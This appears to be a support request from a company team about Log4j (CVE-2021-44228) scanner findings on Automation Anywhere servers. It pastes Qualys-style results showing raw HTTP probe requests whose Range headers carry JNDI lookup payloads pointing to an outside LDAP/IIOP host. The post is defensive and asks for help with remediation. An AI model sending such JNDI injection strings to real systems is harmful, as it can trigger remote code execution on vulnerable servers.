Hello Team, We are facing Log4j Vulnerability issue on Automation Anywhere for existing java jar files, so need urgent support to analyse and resolve the issue in our environment.

CVE ID

Port

Results

CVE-2021-44228

8081

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 8081 port.

GET / HTTP/1.0

Host: cpcinchdv003851.cts.com:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:ldap://10.238.51.15:42187/QUALYSTEST}#

CVE-2021-44228

443

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 443 port.

GET / HTTP/1.0

Host: cpcinchdv003849.cts.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:ldap://10.238.51.15:36528/QUALYSTEST}#

CVE-2021-44228

81

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 81 port.

GET / HTTP/1.0

Host: cpcinchdv003849.cts.com:81

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:iiop://10.238.51.15:36013/QUALYSTEST}#